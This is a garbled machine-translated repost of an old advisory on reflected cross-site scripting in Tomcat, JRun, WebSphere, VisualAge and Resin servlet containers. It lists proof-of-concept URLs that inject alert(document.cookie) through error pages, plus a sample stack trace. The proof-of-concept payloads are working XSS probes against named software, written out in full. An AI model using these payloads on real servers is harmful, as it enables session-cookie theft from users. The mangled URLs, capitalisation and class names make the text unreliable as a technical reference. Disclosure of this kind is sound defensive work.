Java servlet contains script vulnerabilities with intersections

xiaoxiao2021-03-06  74

A number of manufacturers of many vendors contain script vulnerabilities with intersections.

br> ===========================================

The product affected is: ===========================================================================================================================================================

Tomcat 3.2.1, 3.2.2-Beta, 4.0-beta

Jrun 3.0 WebSphere 3.5 FP2, 3.02, Visualage For Java 3.5 Professional

Not affected products, there is no foundation.

Vulnerability: =======

With the following URL, the JavaScript code on the browser can be executed on the server's domain.

Tomcat 3.2.1: http: // Tomcat / JSP-mapped-dir / alert (Document.cookie) .jsp

JRUN 3.0: http:// jrun / alert (document.cookie) .shtmlhttp: // jrun / alert (document.cookie) .jsphttp: // jrun / alert (Document.cookie) .thtml

WebSphere 3.5 fp2:

Http: // WebSphere / WebApp / Examples / Alert (Document.cookie)

WebSphere 3.02:

Http: // WebSphere / Alert (Document.cookie) .jsp Visualage for Java 3.5 Professional:

http: // visualage-webSphere-test-environment / alert (Document.cookie) Resin 1.2.2:

http: // reisin / alert (Document.cookie) .jsp http://www.caucho.com/Document.write (Document.cookie ).jsp These pages are shown below =========== ====================================== r 404 An Error Has Occurred While Processing Request: http: // WebSphere / WebApp / Examples / ****** Message: file not found: file: // ****** stacktrace: com.ibm.servlet.Engine.Webapp.WebapPerReport: File Not Found: File: // ****** At javax.servlet.servletException. (servletexception.java: 107) at com.ibm.websphere.servlet.error.ServleTerrorReport. (servleterrorreport.java: 31) At com.ibm.servlet.Engine .Webapp.WebapPerRreport. (WebApperReport.java: 20) at com.ibm.servlet.EnGine.Webapp.WebappdispatcherResponse.senderror (WebAppdispatcherResponse.java: 97) ... ============== ================================================================================================================================================================== ******: The JavaScript code is executed here. These Vulnerabilities and Microsoft's intersection of IIS released on August 25 last year are very similar

转载请注明原文地址:https://www.9cbs.com/read-121069.html

New Post(0)